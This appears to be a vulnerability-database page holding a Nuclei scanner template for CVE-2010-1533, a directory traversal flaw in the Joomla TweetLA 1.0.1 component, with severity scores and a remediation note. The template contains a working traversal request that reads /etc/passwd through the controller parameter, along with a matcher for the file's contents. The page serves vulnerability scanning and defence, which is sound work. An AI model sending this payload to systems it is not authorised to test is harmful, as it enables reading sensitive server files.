Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2010-1533
HistoryAug 19, 2021 - 11:54 p.m.

Joomla! Component TweetLA 1.0.1 - Local File Inclusion

2021-08-1923:54:26
ProjectDiscovery
github.com
5
cve2010
joomla
local file inclusion
exploit-db
peter_hocherl

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.5

Confidence

Low

EPSS

0.007

Percentile

80.5%

A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a … (dot dot) in the controller parameter to index.php.

id: CVE-2010-1533

info:
  name: Joomla! Component TweetLA 1.0.1 - Local File Inclusion
  author: daffainfo
  severity: high
  description: A directory traversal vulnerability in the TweetLA (com_tweetla) component 1.0.1 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, sensitive information disclosure, and potential remote code execution.
  remediation: Upgrade to the latest version to mitigate this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/12142
    - https://nvd.nist.gov/vuln/detail/CVE-2010-1533
    - http://www.exploit-db.com/exploits/12142
    - https://github.com/ARPSyndicate/kenzer-templates
  classification:
    cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:P/I:P/A:P
    cvss-score: 7.5
    cve-id: CVE-2010-1533
    cwe-id: CWE-22
    epss-score: 0.00706
    epss-percentile: 0.80337
    cpe: cpe:2.3:a:peter_hocherl:com_tweetla:1.0.1:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: peter_hocherl
    product: com_tweetla
  tags: cve2010,cve,joomla,lfi,edb,peter_hocherl

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00"

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 490a0046304402207de073fa377307af9bd3d0b3406ad3f9681feb1ca46031ccfcb6ed7561fc4a940220077be57fecc58376b676559e9e3dae1c8c8a0868e3d9b9654d949e981ad93d8b:922c64590222798bb761d5b6d8e72950

CVSS2

7.5

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:L/Au:N/C:P/I:P/A:P

AI Score

6.5

Confidence

Low

EPSS

0.007

Percentile

80.5%